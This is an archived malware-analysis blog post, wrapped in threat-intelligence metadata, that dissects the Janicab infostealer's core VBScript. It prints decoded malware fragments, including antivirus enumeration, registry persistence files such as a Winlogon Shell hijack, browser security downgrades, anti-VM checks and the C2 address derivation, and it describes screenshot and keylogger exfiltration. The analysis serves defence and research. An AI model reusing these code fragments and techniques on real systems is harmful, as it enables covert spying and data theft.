{
	"id": "0954d560-b8bd-491d-ae70-039097f6c7dc",
	"created_at": "2026-04-06T00:11:03.074729Z",
	"updated_at": "2026-04-10T03:30:57.069032Z",
	"deleted_at": null,
	"sha1_hash": "13437464984e3327e18ed864662731d66bdc8236",
	"title": "Janicab Series: The Core Artifact",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 237682,
	"plain_text": "Janicab Series: The Core Artifact\r\nPublished: 2022-05-27 · Archived: 2026-04-05 22:24:38 UTC\r\nIn late April 2022, I was requested to analyze a software artifact. It was an instance of Janicab, a software with\r\ninfostealing and spying capabilities known since 2013. Differently to other analyses I do as part of my job, in this\r\nparticular case I can disclose parts of it with you readers. I’m addressing those parts in a post series. Based on this\r\nspecific sample, here I’going to analyse the Janicab core artifact. If you want to know more about the previous\r\ninfection stages, I recommend you reading this post (first part) and this post (second part).\r\nArtifact 2.vbe, analysed here, stores an encoded VBScript as an alternate data stream for the %USERPROFILE%\r\ndirectory and later executes it. I claim that such a script is an instance of the Janicab malware. Therefore, I’m\r\ngoing to refer to this script with the name Janicab. I kindly ask the reader to trust my attribution for now, since I’ll\r\nprovide support for my claim in a dedicated and conclusive post.\r\noWMI = \"\"\r\nSet oWMI = GetObject(\"winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter\")\r\nSet oWMI = GetObject(\"winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter2\")\r\nIF vartype(oWMI) = vbString Then\r\ngetAV = \"Unsupported OS\"\r\nExit Function\r\nEND IF\r\nav = \"\"\r\nnumav = 0\r\nSet colItems = oWMI.ExecQuery(\"Select displayName from AntiVirusProduct\")\r\nListing 1\r\n-\r\nJanicab checks for the antivirus products installed on the infected system\r\nAs a first operation, Janicab attempts to understand which antivirus products are running on the infected system.\r\nTo achieve that, it leverages the Windows Management Instrumentation (WMI) API for VBScript and queries the\r\nAntivirusProduct class for the products names. It concatenates the antivirus names in a single AND-separated\r\nstring. Listing 1 shows that part of the Janicab code where the malware obtains the names of the installed\r\nantivirus products.\r\nSet objWMIService = GetObject(\"winmgmts:\\\\.\\root\\cimv2\")\r\nWhile 1\r\nhttps://www.malwarology.com/2022/05/janicab-series-the-core-artifact/\r\nPage 1 of 12\n\nkillRunningIE()\r\nWScript.Sleep 300000\r\nWend\r\nFunction killRunningIE()\r\n On Error Resume Next\r\n Set colProcessList = objWMIService.ExecQuery(\"SELECT * FROM Win32_Process WHERE Name = 'iexp\" \u0026 \"lore.exe'\")\r\n For Each objProcess in colProcessList\r\nOn Error Resume Next\r\nIf inStr(objProcess.CommandLine, \"-Embe\" \u0026 \"dding\") Then\r\nobjProcess.Terminate()\r\nEnd If\r\n Next\r\nEnd Function\r\nListing 2\r\n-\r\nie.vbe script as it appears after having decoded it\r\nJanicab embeds several files. All of them are encoded to escape an otherwise easy detection. The encoding is\r\nalways the same for all the embedded artifacts. The first file being decoded is a VBScript stored on disk as an\r\nNTFS alternate data stream of the %USERPROFILE% directory with name ie.vbe. Ie.vbe is a VBScript encoded\r\nwith the Windows Script Encoder. Janicab executes ie.vbe, which operates as a watchdog since it wakes up every\r\nfive minutes and terminates all the instances Internet Explorer embedded in other applications. Listing 2 shows\r\nthe full listing (after the decoding) of ie.vbe.\r\nFigure 1\r\n-\r\nhttps://www.malwarology.com/2022/05/janicab-series-the-core-artifact/\r\nPage 2 of 12\n\nSMTP-error.txt decoy file dropped by 2.vbe\r\nA second file dropped by Janicab consists of a Shell Link Binary file (LNK) named ‘‘Microsoft Sync\r\nServices.lnk’’ and stored in %APPDATA%\\Microsoft directory. Similarly to what observed for the SMTP-error.txt.lnk (I analysed it in this post), after parsing the LNK file it is possible to observe the latter targeting\r\ncmd.exe and executing a file stored as an NTFS alternate data stream of %USERPROFILE% named h.vbe.\r\nFigure 1 shows just that.\r\nSet s = CreateObject(\"WScript.Shell\")\r\nSet fileSys = CreateObject(\"Scripting.FileSystemObject\")\r\nIF NOT IsProcessRunning(\"explorer.exe\") THEN\r\ns.Run \"explorer\", 0, 0\r\nEND IF\r\npath = s.ExpandEnvironmentStrings(\"%userprofile%\")\r\nSet objFolder = fileSys.GetFolder(path)\r\npath = objFolder.ShortPath\r\nSet objFolder = Nothing\r\nuserProfilePath = split(path, \"\\\")\r\nUsername = userProfilePath(Ubound(userProfilePath))\r\nSet userProfilePath = Nothing\r\ns.currentdirectory = path \u0026 \"\\..\"\r\ns.Run \"cscript \"\"\" \u0026 Username \u0026 \"\"\":.vbe\", 0, 0\r\nFunction IsProcessRunning(strProcess )\r\nOn Error Resume Next\r\n Dim Process, strObject\r\n IsProcessRunning = False\r\n strObject = \"winmgmts://\" \u0026 s.ExpandEnvironmentStrings(\"%ComputerName%\")\r\n For Each Process in GetObject( strObject ).InstancesOf( \"win32_process\" )\r\nabc = Process.name\r\nIf abc \u003c\u003e \"\" Then\r\n If UCase( Process.name ) = UCase( strProcess ) Then\r\nIsProcessRunning = True\r\nExit Function\r\nEnd If\r\nEnd If\r\n Next\r\nEnd Function\r\nListing 3\r\nhttps://www.malwarology.com/2022/05/janicab-series-the-core-artifact/\r\nPage 3 of 12\n\n-\r\nh.vbe full listing\r\nA third file dropped by Janicab is the just mentioned script h.vbe. As the extension may suggest, h.vbe is a\r\nVBScript encoded with Windows Script Encoder. If you consider Listing 3, showing h.vbe, then you might notice\r\nthat h.vbe starts explorer.exe if it isn’t running yet and eventually executes .vbe (discussed in this section).\r\nFunction HandleCCleaner()\r\nOn Error Resume Next\r\nccPath1 = s.ExpandEnvironmentStrings(\"%systemdrive%\") \u0026 \"\\Program Files\\CCleaner\"\r\nccPath2 = s.ExpandEnvironmentStrings(\"%systemdrive%\") \u0026 \"\\Program Files (x86)\\CCleaner\"\r\nIF fileSys.FolderExists(ccPath1) OR fileSys.FolderExists(ccPath2) THEN\r\npath1 = \"HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner\\BrowserMonitoring\"\r\npath2 = \"HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner\\(Mon)3001\"\r\ns.RegDelete path1\r\ns.RegDelete path2\r\nEND IF\r\nEnd Function\r\nListing 4\r\n-\r\nJanicab disables CCleaner browser monitoring capabilityg\r\nJanicab disables CCleaner browser monitoring capability. CCleaner is a common utility used for cleaning unused\r\nfiles and invalid registry entries. As you may notice from Listing 4, it first checks if CCleaner is installed on the\r\ninfected system by testing the existence of any of two utility folders related to the application. If CCleaner is\r\ninstalled, then the malware disables the browser monitoring by deleting two registry keys controlling that\r\ncapability:\r\nHKEY_CURRENT_USER\\Software\\Piriform\\CCleaner\\BrowserMonitoring\r\nHKEY_CURRENT_USER\\Software\\Piriform\\CCleaner(Mon)3001\r\nWindows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce]\r\n\"1\"=\"C:\\\\Users\\\\researcher\\\\AppData\\\\Roaming\\\\Microsoft\\\\Microsoft Sync Services.lnk\"\r\nListing 5\r\n-\r\nFull content of runOnce.reg\r\nhttps://www.malwarology.com/2022/05/janicab-series-the-core-artifact/\r\nPage 4 of 12\n\nJanicab persists to the next reboot of the infected system since it sets a RunOnce key. This form of persistence is\r\nachieved by dropping a registry file named runOnce.reg and importing its content in the registry by issuing\r\nreg.exe. As you can see from the content of runOnce.reg showed in Listing 5, the RunOnce key points to the\r\nMicrosoft Sync Services.lnk file. After the command was issued, Janicab removes the runOnce.reg file.\r\nFigure 2\r\n-\r\n.dll stores a screenshot as a JFIF image in a NTFS alternate data stream of %TMP%\r\nFigure 3\r\n-\r\nScreenshot captured with .dll after issuing the commands of Figure 2\r\nJanicab drops a fifth file named .dll as an NTFS alternate data stream of the %USERPROFILE% directory. This\r\nartifacts is a DLL exporting a screenshot capturing utility. Every time MyDllEntryPoint export of .dll is executed,\r\na screenshot is stored as a NTFS alternate data stream of %TMP% named ~PF214C.tmp. Figure 2 shows an\r\nevidence of such a behavior collected in a safe and controlled environment. Figure 3 shows the screenshot, a JFIF\r\nimage, captured after issuing the commands reported in Figure 2.\r\nhttps://www.malwarology.com/2022/05/janicab-series-the-core-artifact/\r\nPage 5 of 12\n\nWindows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]\r\n\"NoProtectedModeBanner\"=dword:00000001\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]\r\n\"2500\"=dword:00000003\r\nListing 6\r\n-\r\nFull content of vista.reg\r\nanicab leverages WMI API for WBScript to query the Win32_OperatingSystem object and obtain the operating\r\nsystem version. If the running operating system is Microsoft Windows Vista (Vista) then the malware drops\r\nanother registry file named vista.reg. Its content, as for many of the other drops I discuss in this post, is embedded\r\nin an obfuscated form. The content of vista.reg is reported in Listing 6. By executing vista.reg, Janicab attempts to\r\ndisable Internet Explorer protected mode and protected mode banner in Vista. After having imported vista.reg,\r\nJanicab removes the file.\r\nWindows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]\r\n\"Enable Browser Extensions\"=\"no\"\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings]\r\n\"BypassSSLNoCacheCheck\"=dword:00000001\r\n\"DisableCachingOfSSLPages\"=dword:00000000\r\nListing 7\r\n-\r\nFull content of ie.reg\r\nFunction IPConvert(IPAddress)\r\n IF IsNumeric(IPAddress) THEN\r\n IPConvert = \"0.0.0.0\"\r\n For x = 1 To 4\r\n Num = Int(IPAddress / 256 ^ (4 - x))\r\n IPAddress = IPAddress - (Num * 256 ^ (4 - x))\r\n IF Num \u003e 255 THEN\r\n IPConvert = \"0.0.0.0\"\r\n Exit Function\r\nhttps://www.malwarology.com/2022/05/janicab-series-the-core-artifact/\r\nPage 6 of 12\n\nEND IF\r\n IF x = 1 THEN\r\n IPConvert = Num\r\n ELSE\r\n IPConvert = IPConvert \u0026 \".\" \u0026 Num\r\n END IF\r\n Next\r\nEND IF\r\nEnd Function\r\nListing 8\r\n-\r\nJanicab function responsible for converting numerical seed to ip addresses\r\nThe malware drops another registry file called ie.reg. This artifact is stored as a NTFS alternate data stream of\r\n%USERPROFILE% directory. As you may notice from Listing 7, by importing ie.reg with reg.exe utility, Janicab\r\naims to disable Internet Explorer extensions. After all the just described operations, Janicab starts that procedure\r\naimed at obtaining the ip address of the Command \u0026 Control (C2) server. The C2 ip address is computed by\r\nstarting from two distinct sources:\r\nhttp[s]://youtu.be/aZRJQdwN4-g\r\nhttp[s]://plus.google.com/108098760042015113400/posts?hl=en\r\nThe first link is about a YouTube video made private at time of analysis. The second link is about a Google+ post\r\nunavailable at time of analysis due to the social media shutdown made official in 2019. However, from the Janicab\r\nsource code, I know that the C2 ip address is computed by starting from a numerical seed posted somewhere in the\r\nweb pages hosted at those links. The seed is extracted by using the following regex: we need (.*) views . The\r\nseed is divided by the constant 1337 and eventually converted to an ip address with the function showed in\r\nListing 8.\r\nThe malware loops potentially forever until it is able to find a seed in one of those pages. At each iteration of the\r\nloop, the link to be requested is picked up by random. If Janicab is capable of obtaining the C2 address then it\r\nbuilds the C2 url according to the following pattern: http://{C2-IP}/B2mV-VzVc-81Az-135J . The malware\r\nvalidates the C2 url by requesting the /Status2.php resource expected to be hosted on the C2 url. If it finds the\r\nstring OKOKOK in the content of /Status2.php then the validation succeeds.\r\nEach infected host is univocally identified by a 35-symbols-long serial code. The serial code is stored in a text file\r\nnamed pSerial.txt and stored in a NTFS alternate data stream of %USERPROFILE% directory. Janicab checks the\r\nexistence of the serial file and when it succeeds it reads the code from that file. In this case the malware deletes\r\nthe cookies for Internet Explorer, Mozilla Firefox, and Google Chrome. Finally, it attempts a C2 check-in by\r\nrequesting the resource /a.php hosted at the C2 url. This is a GET request with the following parameters:\r\nid. The value for this parameter is the serial code\r\nhttps://www.malwarology.com/2022/05/janicab-series-the-core-artifact/\r\nPage 7 of 12\n\nv. The value for this parameter is the operating system version number\r\nav. The value for this parameter is the list of the installed antivirus products (AND-separated, as discussed\r\nbefore)\r\nIf Janicab doesn’t find a serial file on the infected system, it generates a new one by issuing a request to the C2\r\nurl. The requested resource is /gid.php and the type of request is GET with the following parameters:\r\naction. This parameter is set to the value add\r\ncn. The value for this parameter is the computer name\r\nun. The value for this parameter is the username of the user logged a time of execution\r\nv. The value for this parameter is the operating system version number\r\nav. The value for this parameter is the list of the installed antivirus products (AND-separated, as discussed\r\nbefore)\r\nan. This parameter is set to the value tol7\r\nWindows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]\r\n\"Check_Associations\"=\"no\"\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\TabbedBrowsing]\r\n\"NewTabPageShow\"=dword:00000000\r\n[HKEY_CURRENT_USER\\Control Panel\\Cursors]\r\n\"AppStarting\"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\\\r\n 00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,61,00,65,00,\\\r\n 72,00,6f,00,5f,00,61,00,72,00,72,00,6f,00,77,00,2e,00,63,00,75,00,72,00,00,\\\r\n 00\r\n\"Wait\"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\\\r\n 00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,61,00,65,00,\\\r\n 72,00,6f,00,5f,00,61,00,72,00,72,00,6f,00,77,00,2e,00,63,00,75,00,72,00,00,\\\r\n 00\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced]\r\n\"EnableBalloonTips\"=dword:00000000\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Recovery]\r\n\"AutoRecover\"=dword:00000002\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings]\r\n\"GlobalUserOffline\"=dword:00000000\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]\r\n\"Shell\"=\"wscript.exe \\\"%userprofile%:h.vbe\\\"\"\r\nListing 9\r\n-\r\nFull content of r3g\r\nhttps://www.malwarology.com/2022/05/janicab-series-the-core-artifact/\r\nPage 8 of 12\n\nOnce obtained a new serial, the malware stores it on disk. Janicab asks the C2 whether it should setup a register-based persistence point. That behavior is implemented by requesting the resource /sm.php hosted at the C2 url.\r\nThat is a GET request with a single parameter called data and valorized with the AND-separated list of the\r\ninstalled antiviruses. If the response to that request contains the string reg and, at the same time, Malwarebytes\r\nantivirus isn’t installed on the infected system, then Janicab drops a registry file named r3g. As you may notice\r\nfrom Listing 9, r3g sets a persistence point for the already discussed h.vbe artifact. Before importing r3g with\r\nreg.exe, the malware deletes Microsoft Sync Services.lnk from disk and removes the RunOnce persistence point\r\nfor that file.\r\n00-01-5D 00-10-E0 00-50-56 00-16-3E 00-12-5A 00-25-AE\r\n00-03-BA 00-14-4F 00-0C-29 08-00-27 00-15-5D 00-50-C2\r\n00-07-82 00-20-F2 00-05-69 00-1C-14 00-17-FA 00-50-F2\r\n00-0F-4B 00-21-28 00-03-FF 08-00-20 00-1D-D8 44-45-53\r\n00-10-4F 00-21-F6 00-1C-42 00-0D-3A 00-22-48 7C-ED-8D\r\nTable 1\r\n-\r\nJanicab hardcoded MAC-substrings used to detect a virtualized environment\r\ntaskmgr.exe procexp64.exe immunitydebugger.exe gmer.exe\r\nprocmon.exe ollydbg.exe windbg.exe osam.exe\r\nprocmon64.exe wpe pro.exe tcpview.exe startup.exe\r\nprocexp.exe wireshark.exe tcpvcon.exe listdlls.exe\r\nTable 2\r\n-\r\nJanicab checks if there exists a process having the name containing any of these strings\r\nJanicab operates a security assessment of the infected system aimed at understanding if it is being executed in an\r\nanalysis environment. The security assessment is based of four different checks:\r\nBaseboard manufacturer check. Malware analysis environments are quite often virtualized. Virtual\r\nmachines (VMs) usually emulate the hardware and sometimes VM software providers include their\r\nsignature on some virtualized hardware pieces. Janicab relies on that when it verifies if the baseboard\r\nhttps://www.malwarology.com/2022/05/janicab-series-the-core-artifact/\r\nPage 9 of 12\n\nmanufacturer contains the strings: parallels, virtual platform, or virtualbox. This check is implemented by\r\nquerying the WMI Win32_BaseBoard class for the Product field.\r\nInstalled drivers check. Another way to detect a VM consists in looking at the installed drivers. Just as the\r\nhardware, VM distributors implement custom “fake” drivers exposing distinctive names. Janicab relies on\r\nthat when it checks if there exist any installed driver containing one of the following strings: virtualbox,\r\nparallels, vmware. The driver names are obtained by issuing the driverquery shell command.\r\nMAC address check. Another way to detect a VM consists in looking at the MAC address. This approach\r\nrelies on the expectation that the default MAC address exported by the virtualization software tend to be\r\nthe same given the provider. Janicab verifies if the MAC address of the infected system contains one of the\r\nstrings reported in Table 1 as a means to detect a virtualized environment. The MAC address of the\r\ninfected system is obtained by issuing the ipcfonfig /all shell command.\r\nRunning processes check. Janicab attempts to understand if it is being executed in a malware analysis\r\nenvironment by verifying if any malware analysis tool is running in the infected system. To this extent, the\r\nmalware obtains a list of the currently running processes by issuing the tasklist shell command. Once done\r\nthat, Janicab checks if there exist a process having the name containing one of the strings listed in Table 2.\r\nIf any of the mentioned checks is satisfied then Janicab asks the C2 whether it should keep running or just quit.\r\nThat behavior is implemented by issuing a GET request for the resource /rit.php hosted at the C2 url. The request\r\nparameters are the following:\r\ncn. The value for this parameter is the computer name\r\nun. The value for this parameter is the username of the user logged a time of execution\r\nan. This parameter is set to the value tol7\r\nid. This parameter is set to the serial code\r\nr. This parameter groups all the material collected as a result of the security assessment. More precisely, it\r\nis set to a comma separated list of the following strings: the baseboard manufacturer, the suspicious\r\ninstalled driver (if it was found), the suspicious MAC address (if it was found), and the suspicious running\r\nprocess (if it was found)\r\nvmProd = isVmProduct()\r\nvmDrivers = isVmDrivers()\r\nvmMac = isVmMAC()\r\nrunningProc = checkRunningProcess()\r\nIF NOT vmProd = False OR NOT vmDrivers = False OR NOT vmMac = False OR NOT runningProc = False THEN\r\nreason = vmProd \u0026 \", \" \u0026 vmDrivers \u0026 \", \" \u0026 vmMac \u0026 \", \" \u0026 runningProc\r\nit = getPage(server \u0026 \"/rit.php?cn=\" \u0026 computerName \u0026 \"\u0026un=\" \u0026 userName \u0026 \"\u0026an=\" \u0026 notifyName \u0026 \"\u0026id=\"\r\nIF NOT it = \"skip\" AND NOT fileSys.FileExists (s.ExpandEnvironmentStrings(\"%systemdrive%\") \u0026 \"\\xitx\") T\r\nWscript.Quit 0\r\nEND IF\r\nEND IF\r\nListing 10\r\nhttps://www.malwarology.com/2022/05/janicab-series-the-core-artifact/\r\nPage 10 of 12\n\n-\r\nJanicab quits if detects a malware analysis environment\r\nIf the response from the C2 is skip and, at the same time, there isn’t a directory named xitx under the system drive\r\n(pointed by the %SYSTEMDRIVE% environment variable) then Janicab quits. I asked myself about the reason\r\nfor that directory check. Since xitx is a domain name related to a provider of managed cybersecurity services, it is\r\npossible that the malware developer wanted to avoid the execution on a system either running some product\r\ndistributed by that firm or managed by that firm. Listing 10 shows an excerpt taken from Janicab source code\r\nregarding the behavior I have just described.\r\nEvery minute, Janicab tries to perform the following actions in that exact order:\r\n1. If k.dll, the keylogging utility, has been dropped on the infected system then the malware executes it.\r\n2. Janicab contacts the C2 to fetch any command to execute on the infected system. The instance object of\r\nthis report defines two special commands: downFile and runVbs . Each special command should have a\r\ncorresponding function named as the command and implementing the intended behavior. However, our\r\ninstance only ships with the implementation for downFile command. DownFile downloads a file hosted\r\non the C2 server and stores it on disk. The download function issues a request for the C2 url for the /d.php\r\nresource. This is a GET request having a single parameter, named f, holding the base64-encoded name of\r\nthe file to be downloaded. In addition to the special commands, Janicab allows for the execution of any\r\ncommand that can be issued via powershell.exe if present or cmd.exe as an alternative.\r\n3. Janicab executes .dll, the screenshot capturing utility.\r\n4. If there exists a screenshot stored on the infected system then the malware sends it to the C2. This action is\r\nimplemented by issuing a POST request to the C2 url, resource /rs.php. The request parameters are:\r\ni. This parameter is set to the serial code\r\nd. This parameter is set to the base64-encoded screenshot\r\nt. This parameter is set to the request timestamp\r\nl. This parameter is set to the length of the encoded screenshot\r\nOnce the screenshot has been shipped, the malware wipes it from the infected system\r\n5. If there exists some keylogger output on the infected system then Janicab sends it to the C2. This action is\r\nimplemented by issuing a POST request to the C2 url, resource /rk.php. The request parameters are exactly\r\nthe same to those ones characterizing the C2 request for the previous point. Once the keylogger output has\r\nbeen shipped, the malware wipes that stream from the infected system.\r\nIn the next post of this series I will finalize this series by discussing a bit about the attribution and by providing\r\nsome Indicators of Compromise (IoCs) regarding this particular infection chain. As always, if you want to share\r\ncomments or feedbacks (rigorously in broken Italian or broken English) do not esitate to drop me a message at\r\nadmin[@]malwarology.com.\r\nhttps://www.malwarology.com/2022/05/janicab-series-the-core-artifact/\r\nPage 11 of 12\n\nSource: https://www.malwarology.com/2022/05/janicab-series-the-core-artifact/\r\nhttps://www.malwarology.com/2022/05/janicab-series-the-core-artifact/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.malwarology.com/2022/05/janicab-series-the-core-artifact/"
	],
	"report_names": [
		"janicab-series-the-core-artifact"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434263,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/13437464984e3327e18ed864662731d66bdc8236.pdf",
		"text": "https://archive.orkl.eu/13437464984e3327e18ed864662731d66bdc8236.txt",
		"img": "https://archive.orkl.eu/13437464984e3327e18ed864662731d66bdc8236.jpg"
	}
}